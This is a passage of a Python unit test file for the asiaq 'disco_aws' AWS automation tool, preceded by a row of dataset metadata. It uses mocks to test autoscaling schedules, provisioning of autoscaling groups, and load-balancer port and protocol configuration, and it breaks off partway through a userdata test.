| 15.666667 | 25 | 0.744681 | 6 | 47 | 5.833333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.170213 | 47 | 2 | 26 | 23.5 | 0.897436 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e6e46f764c5b0557f956d8c6aea1ba30d09eccca | 46,181 | py | Python | tests/unit/test_disco_aws.py | amplifylitco/asiaq | a1a292f6e9cbf32a30242405e4947b17910e5369 | [
"BSD-2-Clause"
] | 27 | 2016-03-08T16:50:22.000Z | 2018-11-26T06:33:25.000Z | tests/unit/test_disco_aws.py | amplifylitco/asiaq | a1a292f6e9cbf32a30242405e4947b17910e5369 | [
"BSD-2-Clause"
] | 202 | 2016-03-08T17:13:08.000Z | 2019-02-01T00:49:06.000Z | tests/unit/test_disco_aws.py | amplify-education/asiaq | fb6004bc4da0acef40e7bc18b148db4f72fa2f32 | [
"BSD-2-Clause"
] | 2 | 2016-03-17T18:52:37.000Z | 2016-10-06T20:36:37.000Z | """
Tests of disco_aws
"""
from __future__ import print_function
from unittest import TestCase, skip
from datetime import datetime
from datetime import timedelta
import boto.ec2.instance
from boto.exception import EC2ResponseError
from mock import MagicMock, call, patch, create_autospec
from moto import mock_elb
from disco_aws_automation import DiscoAWS
from disco_aws_automation.exceptions import TimeoutError, SmokeTestError
from disco_aws_automation.disco_elb import DiscoELBPortConfig, DiscoELBPortMapping
from tests.helpers.patch_disco_aws import (patch_disco_aws,
get_default_config_dict,
get_mock_config,
TEST_ENV_NAME)
def _get_meta_network_mock():
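# fabricate a meta network whose security group and three per-zone subnets reuse fixed test IDs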
ret = MagicMock()
ret.security_group = MagicMock()
ret.security_group.id = "sg-1234abcd"
ret.disco_subnets = {}
for _ in xrange(3):
zone_name = 'zone{0}'.format(_)
ret.disco_subnets[zone_name] = MagicMock()
ret.disco_subnets[zone_name].subnet_dict = dict()
ret.disco_subnets[zone_name].subnet_dict['SubnetId'] = "s-1234abcd"
return MagicMock(return_value=ret)
# Not every test will use the mocks in **kwargs, so disable the unused argument warning
# pylint: disable=W0613
class DiscoAWSTests(TestCase):
'''Test DiscoAWS class'''
def setUp(self):
self.instance = create_autospec(boto.ec2.instance.Instance)
self.instance.state = "running"
self.instance.tags = create_autospec(boto.ec2.tag.TagSet)
self.instance.id = "i-12345678"
@patch_disco_aws
def test_create_scaling_schedule_only_desired(self, mock_config, **kwargs):
"""test create_scaling_schedule with only desired schedule"""
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME, discogroup=MagicMock())
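# size schedules are "<size>@<cron expression>" entries joined by ':'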
aws.create_scaling_schedule("1", "2@1 0 * * *:3@6 0 * * *", "5", hostclass="mhcboo")
aws.discogroup.assert_has_calls([
call.delete_all_recurring_group_actions(hostclass='mhcboo', group_name=None),
call.create_recurring_group_action('1 0 * * *', hostclass='mhcboo', group_name=None,
min_size=None, desired_capacity=2, max_size=None),
call.create_recurring_group_action('6 0 * * *', hostclass='mhcboo', group_name=None,
min_size=None, desired_capacity=3, max_size=None)
], any_order=True)
@patch_disco_aws
def test_create_scaling_schedule_no_sched(self, mock_config, **kwargs):
"""test create_scaling_schedule with only desired schedule"""
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME, discogroup=MagicMock())
aws.create_scaling_schedule("1", "2", "5", hostclass="mhcboo")
aws.discogroup.assert_has_calls([
call.delete_all_recurring_group_actions(hostclass='mhcboo', group_name=None)
])
@patch_disco_aws
def test_create_scaling_schedule_overlapping(self, mock_config, **kwargs):
"""test create_scaling_schedule with only desired schedule"""
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME, discogroup=MagicMock())
aws.create_scaling_schedule(
"1@1 0 * * *:2@6 0 * * *",
"2@1 0 * * *:3@6 0 * * *",
"6@1 0 * * *:9@6 0 * * *",
hostclass="mhcboo"
)
aws.discogroup.assert_has_calls([
call.delete_all_recurring_group_actions(hostclass='mhcboo', group_name=None),
call.create_recurring_group_action('1 0 * * *', hostclass='mhcboo', group_name=None,
min_size=1, desired_capacity=2, max_size=6),
call.create_recurring_group_action('6 0 * * *', hostclass='mhcboo', group_name=None,
min_size=2, desired_capacity=3, max_size=9)
], any_order=True)
@patch_disco_aws
def test_create_scaling_schedule_mixed(self, mock_config, **kwargs):
"""test create_scaling_schedule with only desired schedule"""
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME, discogroup=MagicMock())
aws.create_scaling_schedule(
"1@1 0 * * *:2@7 0 * * *",
"2@1 0 * * *:3@6 0 * * *",
"6@2 0 * * *:9@6 0 * * *",
hostclass="mhcboo"
)
aws.discogroup.assert_has_calls([
call.delete_all_recurring_group_actions(hostclass='mhcboo', group_name=None),
call.create_recurring_group_action('1 0 * * *', hostclass='mhcboo', group_name=None,
min_size=1, desired_capacity=2, max_size=None),
call.create_recurring_group_action('2 0 * * *', hostclass='mhcboo', group_name=None,
min_size=None, desired_capacity=None, max_size=6),
call.create_recurring_group_action('6 0 * * *', hostclass='mhcboo', group_name=None,
min_size=None, desired_capacity=3, max_size=9),
call.create_recurring_group_action('7 0 * * *', hostclass='mhcboo', group_name=None,
min_size=2, desired_capacity=None, max_size=None)
], any_order=True)
def _get_image_mock(self, aws):
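# launch a throwaway instance on the mocked EC2 connection and register an AMI from it;
# the returned MagicMock only needs to carry the resulting AMI id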
reservation = aws.connection.run_instances('ami-1234abcd')
instance = reservation.instances[0]
mock_ami = MagicMock()
mock_ami.id = aws.connection.create_image(instance.id, "test-ami", "this is a test ami")
return mock_ami
@skip("Broken due to boto3 upgrade. Need to refactor this test")
@patch_disco_aws
def test_provision_hostclass_simple(self, mock_config, **kwargs):
"""
Provision creates the proper launch configuration and autoscaling group
"""
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME, log_metrics=MagicMock())
mock_ami = self._get_image_mock(aws)
aws.update_elb = MagicMock(return_value=None)
aws.discogroup.elastigroup.spotinst_client = MagicMock()
aws.vpc.environment_class = None
with patch("disco_aws_automation.DiscoAWS.get_meta_network", return_value=_get_meta_network_mock()):
with patch("boto.ec2.connection.EC2Connection.get_all_snapshots", return_value=[]):
with patch("disco_aws_automation.DiscoAWS.create_scaling_schedule", return_value=None):
with patch("boto.ec2.autoscale.AutoScaleConnection.create_or_update_tags",
return_value=None):
with patch("disco_aws_automation.DiscoELB.get_or_create_target_group",
return_value="foobar"):
with patch("disco_aws_automation.DiscoAutoscale.update_tg",
return_value=None):
metadata = aws.provision(ami=mock_ami, hostclass="mhcunittest",
owner="unittestuser",
min_size=1, desired_size=1, max_size=1)
self.assertEqual(metadata["hostclass"], "mhcunittest")
self.assertFalse(metadata["no_destroy"])
self.assertTrue(metadata["chaos"])
_lc = aws.discogroup.get_configs()[0]
self.assertRegexpMatches(_lc.name, r".*_mhcunittest_[0-9]*")
self.assertEqual(_lc.image_id, mock_ami.id)
self.assertTrue(aws.discogroup.get_existing_group(hostclass="mhcunittest"))
_ag = aws.discogroup.get_existing_groups()[0]
self.assertRegexpMatches(_ag['name'], r"unittestenv_mhcunittest_[0-9]*")
self.assertEqual(_ag['min_size'], 1)
self.assertEqual(_ag['max_size'], 1)
self.assertEqual(_ag['desired_capacity'], 1)
@skip("Broken due to boto3 upgrade. Need to refactor this test")
@patch_disco_aws
def test_provision_hc_simple_with_no_chaos(self, mock_config, **kwargs):
"""
Provision creates the proper launch configuration and autoscaling group with no chaos
"""
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME, log_metrics=MagicMock())
mock_ami = self._get_image_mock(aws)
aws.update_elb = MagicMock(return_value=None)
aws.discogroup.elastigroup.spotinst_client = MagicMock()
aws.vpc.environment_class = None
with patch("disco_aws_automation.DiscoAWS.get_meta_network", return_value=_get_meta_network_mock()):
with patch("boto.ec2.connection.EC2Connection.get_all_snapshots", return_value=[]):
with patch("disco_aws_automation.DiscoAWS.create_scaling_schedule", return_value=None):
with patch("boto.ec2.autoscale.AutoScaleConnection.create_or_update_tags",
return_value=None):
with patch("disco_aws_automation.DiscoELB.get_or_create_target_group",
return_value="foobar"):
with patch("disco_aws_automation.DiscoAutoscale.update_tg",
return_value=None):
metadata = aws.provision(ami=mock_ami, hostclass="mhcunittest",
owner="unittestuser",
min_size=1, desired_size=1, max_size=1,
chaos="False")
self.assertEqual(metadata["hostclass"], "mhcunittest")
self.assertFalse(metadata["no_destroy"])
self.assertFalse(metadata["chaos"])
_lc = aws.discogroup.get_configs()[0]
self.assertRegexpMatches(_lc.name, r".*_mhcunittest_[0-9]*")
self.assertEqual(_lc.image_id, mock_ami.id)
self.assertTrue(aws.discogroup.get_existing_group(hostclass="mhcunittest"))
_ag = aws.discogroup.get_existing_groups()[0]
self.assertRegexpMatches(_ag['name'], r"unittestenv_mhcunittest_[0-9]*")
self.assertEqual(_ag['min_size'], 1)
self.assertEqual(_ag['max_size'], 1)
self.assertEqual(_ag['desired_capacity'], 1)
@skip("Broken due to boto3 upgrade. Need to refactor this test")
@patch_disco_aws
def test_provision_hc_with_chaos_using_config(self, mock_config, **kwargs):
"""
Provision creates the proper launch configuration and autoscaling group with chaos from config
"""
config_dict = get_default_config_dict()
config_dict["mhcunittest"]["chaos"] = "True"
aws = DiscoAWS(config=get_mock_config(config_dict), environment_name=TEST_ENV_NAME,
log_metrics=MagicMock())
mock_ami = self._get_image_mock(aws)
aws.update_elb = MagicMock(return_value=None)
aws.discogroup.elastigroup.spotinst_client = MagicMock()
aws.vpc.environment_class = None
with patch("disco_aws_automation.DiscoAWS.get_meta_network", return_value=_get_meta_network_mock()):
with patch("boto.ec2.connection.EC2Connection.get_all_snapshots", return_value=[]):
with patch("disco_aws_automation.DiscoAWS.create_scaling_schedule", return_value=None):
with patch("boto.ec2.autoscale.AutoScaleConnection.create_or_update_tags",
return_value=None):
with patch("disco_aws_automation.DiscoELB.get_or_create_target_group",
return_value="foobar"):
with patch("disco_aws_automation.DiscoAutoscale.update_tg",
return_value=None):
metadata = aws.provision(ami=mock_ami, hostclass="mhcunittest",
owner="unittestuser",
min_size=1, desired_size=1, max_size=1)
self.assertEqual(metadata["hostclass"], "mhcunittest")
self.assertFalse(metadata["no_destroy"])
self.assertTrue(metadata["chaos"])
_lc = aws.discogroup.get_configs()[0]
self.assertRegexpMatches(_lc.name, r".*_mhcunittest_[0-9]*")
self.assertEqual(_lc.image_id, mock_ami.id)
self.assertTrue(aws.discogroup.get_existing_group(hostclass="mhcunittest"))
_ag = aws.discogroup.get_existing_groups()[0]
self.assertRegexpMatches(_ag['name'], r"unittestenv_mhcunittest_[0-9]*")
self.assertEqual(_ag['min_size'], 1)
self.assertEqual(_ag['max_size'], 1)
self.assertEqual(_ag['desired_capacity'], 1)
@skip("Broken due to boto3 upgrade. Need to refactor this test")
@patch_disco_aws
def test_provision_hostclass_schedules(self, mock_config, **kwargs):
"""
Provision creates the proper autoscaling group sizes with scheduled sizes
"""
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME, log_metrics=MagicMock())
aws.update_elb = MagicMock(return_value=None)
aws.discogroup.elastigroup.spotinst_client = MagicMock()
aws.vpc.environment_class = None
with patch("disco_aws_automation.DiscoAWS.get_meta_network", return_value=_get_meta_network_mock()):
with patch("boto.ec2.connection.EC2Connection.get_all_snapshots", return_value=[]):
with patch("disco_aws_automation.DiscoAWS.create_scaling_schedule", return_value=None):
with patch("boto.ec2.autoscale.AutoScaleConnection.create_or_update_tags",
return_value=None):
with patch("disco_aws_automation.DiscoELB.get_or_create_target_group",
return_value="foobar"):
with patch("disco_aws_automation.DiscoAutoscale.update_tg",
return_value=None):
aws.provision(ami=self._get_image_mock(aws),
hostclass="mhcunittest", owner="unittestuser",
min_size="1@1 0 * * *:2@6 0 * * *",
desired_size="2@1 0 * * *:3@6 0 * * *",
max_size="6@1 0 * * *:9@6 0 * * *")
_ag = aws.discogroup.get_existing_groups()[0]
self.assertEqual(_ag['min_size'], 1) # minimum of listed sizes
self.assertEqual(_ag['desired_capacity'], 3) # maximum of listed sizes
self.assertEqual(_ag['max_size'], 9) # maximum of listed sizes
@skip("Broken due to boto3 upgrade. Need to refactor this test")
@patch_disco_aws
def test_provision_hostclass_sched_some_none(self, mock_config, **kwargs):
"""
Provision creates the proper autoscaling group sizes when only some sizes carry schedules
"""
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME, log_metrics=MagicMock())
aws.update_elb = MagicMock(return_value=None)
aws.discogroup.elastigroup.spotinst_client = MagicMock()
aws.vpc.environment_class = None
with patch("disco_aws_automation.DiscoAWS.get_meta_network", return_value=_get_meta_network_mock()):
with patch("boto.ec2.connection.EC2Connection.get_all_snapshots", return_value=[]):
with patch("disco_aws_automation.DiscoAWS.create_scaling_schedule", return_value=None):
with patch("boto.ec2.autoscale.AutoScaleConnection.create_or_update_tags",
return_value=None):
with patch("disco_aws_automation.DiscoELB.get_or_create_target_group",
return_value="foobar"):
with patch("disco_aws_automation.DiscoAutoscale.update_tg",
return_value=None):
aws.provision(ami=self._get_image_mock(aws),
hostclass="mhcunittest", owner="unittestuser",
min_size="",
desired_size="2@1 0 * * *:3@6 0 * * *", max_size="")
_ag = aws.discogroup.get_existing_groups()[0]
print("({0}, {1}, {2})".format(_ag['min_size'], _ag['desired_capacity'], _ag['max_size']))
self.assertEqual(_ag['min_size'], 0) # empty min_size defaults to 0
self.assertEqual(_ag['desired_capacity'], 3) # maximum of the listed desired sizes
self.assertEqual(_ag['max_size'], 3) # empty max_size falls back to the desired maximum
@skip("Broken due to boto3 upgrade. Need to refactor this test")
@patch_disco_aws
def test_provision_hostclass_sched_all_none(self, mock_config, **kwargs):
"""
Provision handles empty sizes: they default to zero for a new group and are left unchanged for an existing one
"""
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME, log_metrics=MagicMock())
aws.update_elb = MagicMock(return_value=None)
aws.discogroup.elastigroup.spotinst_client = MagicMock()
aws.vpc.environment_class = None
with patch("disco_aws_automation.DiscoAWS.get_meta_network", return_value=_get_meta_network_mock()):
with patch("boto.ec2.connection.EC2Connection.get_all_snapshots", return_value=[]):
with patch("disco_aws_automation.DiscoAWS.create_scaling_schedule", return_value=None):
with patch("boto.ec2.autoscale.AutoScaleConnection.create_or_update_tags",
return_value=None):
with patch("disco_aws_automation.DiscoELB.get_or_create_target_group",
return_value="foobar"):
with patch("disco_aws_automation.DiscoAutoscale.update_tg",
return_value=None):
aws.provision(ami=self._get_image_mock(aws),
hostclass="mhcunittest", owner="unittestuser",
min_size="", desired_size="", max_size="")
_ag0 = aws.discogroup.get_existing_groups()[0]
self.assertEqual(_ag0['min_size'], 0) # all sizes empty, so min defaults to 0
self.assertEqual(_ag0['desired_capacity'], 0) # all sizes empty, so desired defaults to 0
self.assertEqual(_ag0['max_size'], 0) # all sizes empty, so max defaults to 0
with patch("disco_aws_automation.DiscoAWS.get_meta_network", return_value=_get_meta_network_mock()):
with patch("boto.ec2.connection.EC2Connection.get_all_snapshots", return_value=[]):
with patch("disco_aws_automation.DiscoAWS.create_scaling_schedule", return_value=None):
with patch("boto.ec2.autoscale.AutoScaleConnection.create_or_update_tags",
return_value=None):
with patch("disco_aws_automation.DiscoELB.get_or_create_target_group",
return_value="foobar"):
with patch("disco_aws_automation.DiscoAutoscale.update_tg",
return_value=None):
aws.provision(ami=self._get_image_mock(aws),
hostclass="mhcunittest", owner="unittestuser",
min_size="3", desired_size="6", max_size="9")
_ag1 = aws.discogroup.get_existing_groups()[0]
self.assertEqual(_ag1['min_size'], 3) # static min_size as given
self.assertEqual(_ag1['desired_capacity'], 6) # static desired_size as given
self.assertEqual(_ag1['max_size'], 9) # static max_size as given
with patch("disco_aws_automation.DiscoAWS.get_meta_network", return_value=_get_meta_network_mock()):
with patch("boto.ec2.connection.EC2Connection.get_all_snapshots", return_value=[]):
with patch("disco_aws_automation.DiscoAWS.create_scaling_schedule", return_value=None):
with patch("boto.ec2.autoscale.AutoScaleConnection.create_or_update_tags",
return_value=None):
with patch("disco_aws_automation.DiscoELB.get_or_create_target_group",
return_value="foobar"):
with patch("disco_aws_automation.DiscoAutoscale.update_tg",
return_value=None):
aws.provision(ami=self._get_image_mock(aws),
hostclass="mhcunittest", owner="unittestuser",
min_size="", desired_size="", max_size="")
_ag2 = aws.discogroup.get_existing_groups()[0]
self.assertEqual(_ag2['min_size'], 3) # empty sizes leave the existing group unchanged
self.assertEqual(_ag2['desired_capacity'], 6) # empty sizes leave the existing group unchanged
self.assertEqual(_ag2['max_size'], 9) # empty sizes leave the existing group unchanged
@patch_disco_aws
def test_update_elb_delete(self, mock_config, **kwargs):
'''Update ELB deletes ELBs that are no longer configured'''
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME, elb=MagicMock())
aws.elb.get_elb = MagicMock(return_value=True)
aws.elb.delete_elb = MagicMock()
aws.update_elb("mhcfoo", update_autoscaling=False)
aws.elb.delete_elb.assert_called_once_with("mhcfoo")
def _get_elb_config(self, overrides=None):
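# base config for an ELB-enabled hostclass; callers pass overrides to vary the port/protocol settings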
overrides = overrides or {}
config = get_default_config_dict()
config["mhcelb"] = {
"subnet": "intranet",
"security_group": "intranet",
"ssh_key_name": "unittestkey",
"instance_profile_name": "unittestprofile",
"public_ip": "False",
"ip_address": None,
"eip": None,
"domain_name": "example.com",
"elb": "yes",
"elb_health_check_url": "/foo",
"product_line": "mock_productline"
}
config["mhcelb"].update(overrides)
return get_mock_config(config)
@mock_elb
@patch_disco_aws
def test_update_elb_all_defaults(self, mock_config, **kwargs):
"""
update_elb calls get_or_create_elb with default port and protocol values if all are missing
"""
aws = DiscoAWS(config=self._get_elb_config(), environment_name=TEST_ENV_NAME, elb=MagicMock())
aws.elb.get_or_create_elb = MagicMock(return_value=MagicMock())
aws.get_meta_network_by_name = _get_meta_network_mock()
aws.elb.delete_elb = MagicMock()
aws.update_elb("mhcelb", update_autoscaling=False)
aws.elb.delete_elb.assert_not_called()
aws.elb.get_or_create_elb.assert_called_once_with(
'mhcelb',
health_check_url='/foo',
hosted_zone_name='example.com',
port_config=DiscoELBPortConfig(
[
DiscoELBPortMapping(80, 'HTTP', 80, 'HTTP'),
]
),
security_groups=['sg-1234abcd'], elb_public=False,
sticky_app_cookie=None, subnets=['s-1234abcd', 's-1234abcd', 's-1234abcd'],
elb_dns_alias=None,
connection_draining_timeout=300, idle_timeout=300, testing=False,
tags={
'environment': 'unittestenv',
'hostclass': 'mhcelb',
'is_testing': '0',
'productline': 'mock_productline'
},
cross_zone_load_balancing=True,
cert_name=None
)
@mock_elb
@patch_disco_aws
def test_update_elb_some_defaults(self, mock_config, **kwargs):
"""
update_elb calls get_or_create_elb with default port and protocol values if some are missing
"""
overrides = {
'elb_instance_port': '80, 80',
'elb_instance_protocol': 'HTTP',
'elb_port': '443',
'elb_protocol': 'HTTPS, HTTPS'
}
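# shorter lists are expected to repeat: the single 'HTTP' and '443' apply to both mappings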
aws = DiscoAWS(
config=self._get_elb_config(overrides),
environment_name=TEST_ENV_NAME,
elb=MagicMock()
)
aws.elb.get_or_create_elb = MagicMock(return_value=MagicMock())
aws.get_meta_network_by_name = _get_meta_network_mock()
aws.elb.delete_elb = MagicMock()
aws.update_elb("mhcelb", update_autoscaling=False)
aws.elb.delete_elb.assert_not_called()
aws.elb.get_or_create_elb.assert_called_once_with(
'mhcelb',
health_check_url='/foo',
hosted_zone_name='example.com',
port_config=DiscoELBPortConfig(
[
DiscoELBPortMapping(80, 'HTTP', 443, 'HTTPS'),
DiscoELBPortMapping(80, 'HTTP', 443, 'HTTPS')
]
),
security_groups=['sg-1234abcd'], elb_public=False,
sticky_app_cookie=None, subnets=['s-1234abcd', 's-1234abcd', 's-1234abcd'],
elb_dns_alias=None,
connection_draining_timeout=300, idle_timeout=300, testing=False,
tags={
'environment': 'unittestenv',
'hostclass': 'mhcelb',
'is_testing': '0',
'productline': 'mock_productline'
},
cross_zone_load_balancing=True,
cert_name=None
)
@mock_elb
@patch_disco_aws
def test_update_elb_no_defaults(self, mock_config, **kwargs):
"""
update_elb calls get_or_create_elb with port and protocol values
"""
overrides = {
'elb_instance_port': '80, 80, 27017',
'elb_instance_protocol': 'HTTP, HTTP, TCP',
'elb_port': '443, 443, 27017',
'elb_protocol': 'HTTPS, HTTPS, TCP'
}
aws = DiscoAWS(
config=self._get_elb_config(overrides),
environment_name=TEST_ENV_NAME,
elb=MagicMock()
)
aws.elb.get_or_create_elb = MagicMock(return_value=MagicMock())
aws.get_meta_network_by_name = _get_meta_network_mock()
aws.elb.delete_elb = MagicMock()
aws.update_elb("mhcelb", update_autoscaling=False)
aws.elb.delete_elb.assert_not_called()
aws.elb.get_or_create_elb.assert_called_once_with(
'mhcelb',
health_check_url='/foo',
hosted_zone_name='example.com',
port_config=DiscoELBPortConfig(
[
DiscoELBPortMapping(80, 'HTTP', 443, 'HTTPS'),
DiscoELBPortMapping(80, 'HTTP', 443, 'HTTPS'),
DiscoELBPortMapping(27017, 'TCP', 27017, 'TCP')
]
),
security_groups=['sg-1234abcd'], elb_public=False,
sticky_app_cookie=None, subnets=['s-1234abcd', 's-1234abcd', 's-1234abcd'],
elb_dns_alias=None,
connection_draining_timeout=300, idle_timeout=300, testing=False,
tags={
'environment': 'unittestenv',
'hostclass': 'mhcelb',
'is_testing': '0',
'productline': 'mock_productline'
},
cross_zone_load_balancing=True,
cert_name=None
)
@mock_elb
@patch_disco_aws
def test_update_elb_single(self, mock_config, **kwargs):
"""
update_elb calls get_or_create_elb with port and protocol values for a single port and protocol
"""
overrides = {
'elb_instance_port': '80',
'elb_instance_protocol': 'HTTP',
'elb_port': '443',
'elb_protocol': 'HTTPS'
}
aws = DiscoAWS(
config=self._get_elb_config(overrides),
environment_name=TEST_ENV_NAME,
elb=MagicMock()
)
aws.elb.get_or_create_elb = MagicMock(return_value=MagicMock())
aws.get_meta_network_by_name = _get_meta_network_mock()
aws.elb.delete_elb = MagicMock()
aws.update_elb("mhcelb", update_autoscaling=False)
aws.elb.delete_elb.assert_not_called()
aws.elb.get_or_create_elb.assert_called_once_with(
'mhcelb',
health_check_url='/foo',
hosted_zone_name='example.com',
port_config=DiscoELBPortConfig(
[
DiscoELBPortMapping(80, 'HTTP', 443, 'HTTPS'),
]
),
security_groups=['sg-1234abcd'], elb_public=False,
sticky_app_cookie=None, subnets=['s-1234abcd', 's-1234abcd', 's-1234abcd'],
elb_dns_alias=None,
connection_draining_timeout=300, idle_timeout=300, testing=False,
tags={
'environment': 'unittestenv',
'hostclass': 'mhcelb',
'is_testing': '0',
'productline': 'mock_productline'
},
cross_zone_load_balancing=True,
cert_name=None
)
@mock_elb
@patch_disco_aws
def test_update_elb_lowercase(self, mock_config, **kwargs):
"""
update_elb accepts lowercase protocols
"""
overrides = {
'elb_instance_port': '80',
'elb_instance_protocol': 'http',
'elb_port': '443',
'elb_protocol': 'https'
}
aws = DiscoAWS(
config=self._get_elb_config(overrides),
environment_name=TEST_ENV_NAME,
elb=MagicMock()
)
aws.elb.get_or_create_elb = MagicMock(return_value=MagicMock())
aws.get_meta_network_by_name = _get_meta_network_mock()
aws.elb.delete_elb = MagicMock()
aws.update_elb("mhcelb", update_autoscaling=False)
aws.elb.delete_elb.assert_not_called()
aws.elb.get_or_create_elb.assert_called_once_with(
'mhcelb',
health_check_url='/foo',
hosted_zone_name='example.com',
port_config=DiscoELBPortConfig(
[
DiscoELBPortMapping(80, 'HTTP', 443, 'HTTPS'),
]
),
security_groups=['sg-1234abcd'], elb_public=False,
sticky_app_cookie=None, subnets=['s-1234abcd', 's-1234abcd', 's-1234abcd'],
elb_dns_alias=None,
connection_draining_timeout=300, idle_timeout=300, testing=False,
tags={
'environment': 'unittestenv',
'hostclass': 'mhcelb',
'is_testing': '0',
'productline': 'mock_productline'
},
cross_zone_load_balancing=True,
cert_name=None
)
@mock_elb
@patch_disco_aws
def test_update_elb_mismatch(self, mock_config, **kwargs):
"""
        update_elb falls back to instance=ELB for the extra ELB ports when given mismatched numbers of instance and ELB ports
"""
overrides = {
'elb_instance_port': '80, 9001',
'elb_instance_protocol': 'HTTP, HTTP',
'elb_port': '443, 80, 9002',
'elb_protocol': 'HTTPS, HTTP, HTTP'
}
aws = DiscoAWS(
config=self._get_elb_config(overrides),
environment_name=TEST_ENV_NAME,
elb=MagicMock()
)
aws.elb.get_or_create_elb = MagicMock(return_value=MagicMock())
aws.get_meta_network_by_name = _get_meta_network_mock()
aws.elb.delete_elb = MagicMock()
aws.update_elb("mhcelb", update_autoscaling=False)
aws.elb.delete_elb.assert_not_called()
aws.elb.get_or_create_elb.assert_called_once_with(
'mhcelb',
health_check_url='/foo',
hosted_zone_name='example.com',
port_config=DiscoELBPortConfig(
[
DiscoELBPortMapping(80, 'HTTP', 443, 'HTTPS'),
DiscoELBPortMapping(9001, 'HTTP', 80, 'HTTP'),
DiscoELBPortMapping(9002, 'HTTP', 9002, 'HTTP')
]
),
security_groups=['sg-1234abcd'], elb_public=False,
sticky_app_cookie=None, subnets=['s-1234abcd', 's-1234abcd', 's-1234abcd'],
elb_dns_alias=None,
connection_draining_timeout=300, idle_timeout=300, testing=False,
tags={
'environment': 'unittestenv',
'hostclass': 'mhcelb',
'is_testing': '0',
'productline': 'mock_productline'
},
cross_zone_load_balancing=True,
cert_name=None
)
@mock_elb
@patch_disco_aws
def test_update_elb_mismatch_no_external(self, mock_config, **kwargs):
"""
        update_elb mirrors the single instance port/protocol on the ELB side when no ELB port/protocol is given
"""
overrides = {
'elb_instance_port': '80',
'elb_instance_protocol': 'HTTP',
}
aws = DiscoAWS(
config=self._get_elb_config(overrides),
environment_name=TEST_ENV_NAME,
elb=MagicMock()
)
aws.elb.get_or_create_elb = MagicMock(return_value=MagicMock())
aws.get_meta_network_by_name = _get_meta_network_mock()
aws.elb.delete_elb = MagicMock()
aws.update_elb("mhcelb", update_autoscaling=False)
aws.elb.delete_elb.assert_not_called()
aws.elb.get_or_create_elb.assert_called_once_with(
'mhcelb',
health_check_url='/foo',
hosted_zone_name='example.com',
port_config=DiscoELBPortConfig(
[
DiscoELBPortMapping(80, 'HTTP', 80, 'HTTP'),
]
),
security_groups=['sg-1234abcd'], elb_public=False,
sticky_app_cookie=None, subnets=['s-1234abcd', 's-1234abcd', 's-1234abcd'],
elb_dns_alias=None,
connection_draining_timeout=300, idle_timeout=300, testing=False,
tags={
'environment': 'unittestenv',
'hostclass': 'mhcelb',
'is_testing': '0',
'productline': 'mock_productline'
},
cross_zone_load_balancing=True,
cert_name=None
)
@mock_elb
@patch_disco_aws
def test_update_elb_replicate(self, mock_config, **kwargs):
"""
update_elb replicates the instance configuration when given a single instance port and protocol
"""
overrides = {
'elb_instance_port': '80',
'elb_instance_protocol': 'HTTP',
'elb_port': '443, 9001',
'elb_protocol': 'HTTPS, HTTP'
}
aws = DiscoAWS(
config=self._get_elb_config(overrides),
environment_name=TEST_ENV_NAME,
elb=MagicMock()
)
aws.elb.get_or_create_elb = MagicMock(return_value=MagicMock())
aws.get_meta_network_by_name = _get_meta_network_mock()
aws.elb.delete_elb = MagicMock()
aws.update_elb("mhcelb", update_autoscaling=False)
aws.elb.delete_elb.assert_not_called()
aws.elb.get_or_create_elb.assert_called_once_with(
'mhcelb',
health_check_url='/foo',
hosted_zone_name='example.com',
port_config=DiscoELBPortConfig(
[
DiscoELBPortMapping(80, 'HTTP', 443, 'HTTPS'),
DiscoELBPortMapping(80, 'HTTP', 9001, 'HTTP')
]
),
security_groups=['sg-1234abcd'], elb_public=False,
sticky_app_cookie=None, subnets=['s-1234abcd', 's-1234abcd', 's-1234abcd'],
elb_dns_alias=None,
connection_draining_timeout=300, idle_timeout=300, testing=False,
tags={
'environment': 'unittestenv',
'hostclass': 'mhcelb',
'is_testing': '0',
'productline': 'mock_productline'
},
cross_zone_load_balancing=True,
cert_name=None
)
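    # The mismatch/replicate tests above pin down how update_elb pairs the
    # instance and ELB port lists. The helper below is a hypothetical
    # illustration of that pairing rule, written for clarity only; the real
    # logic lives inside DiscoAWS.update_elb and may differ in detail.
    @staticmethod
    def _illustrate_port_pairing(inst_ports, inst_protos, elb_ports, elb_protos):
        """Sketch of the pairing the tests assert: a single instance entry is
        replicated, extra ELB entries fall back to instance=ELB, and a missing
        ELB side mirrors the instance side."""
        if not elb_ports:
            elb_ports, elb_protos = list(inst_ports), list(inst_protos)
        mappings = []
        for i, (e_port, e_proto) in enumerate(zip(elb_ports, elb_protos)):
            if len(inst_ports) == 1:
                i_port, i_proto = inst_ports[0], inst_protos[0]
            elif i < len(inst_ports):
                i_port, i_proto = inst_ports[i], inst_protos[i]
            else:
                i_port, i_proto = e_port, e_proto
            mappings.append((i_port, i_proto.upper(), e_port, e_proto.upper()))
        return mappings

    # e.g. _illustrate_port_pairing([80, 9001], ['HTTP', 'HTTP'],
    #                               [443, 80, 9002], ['HTTPS', 'HTTP', 'HTTP'])
    # -> [(80, 'HTTP', 443, 'HTTPS'), (9001, 'HTTP', 80, 'HTTP'),
    #     (9002, 'HTTP', 9002, 'HTTP')]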
@patch_disco_aws
def test_create_userdata_with_eip(self, **kwargs):
"""
create_userdata sets 'eip' key when an EIP is required
"""
config_dict = get_default_config_dict()
eip = "54.201.250.76"
config_dict["mhcunittest"]["eip"] = eip
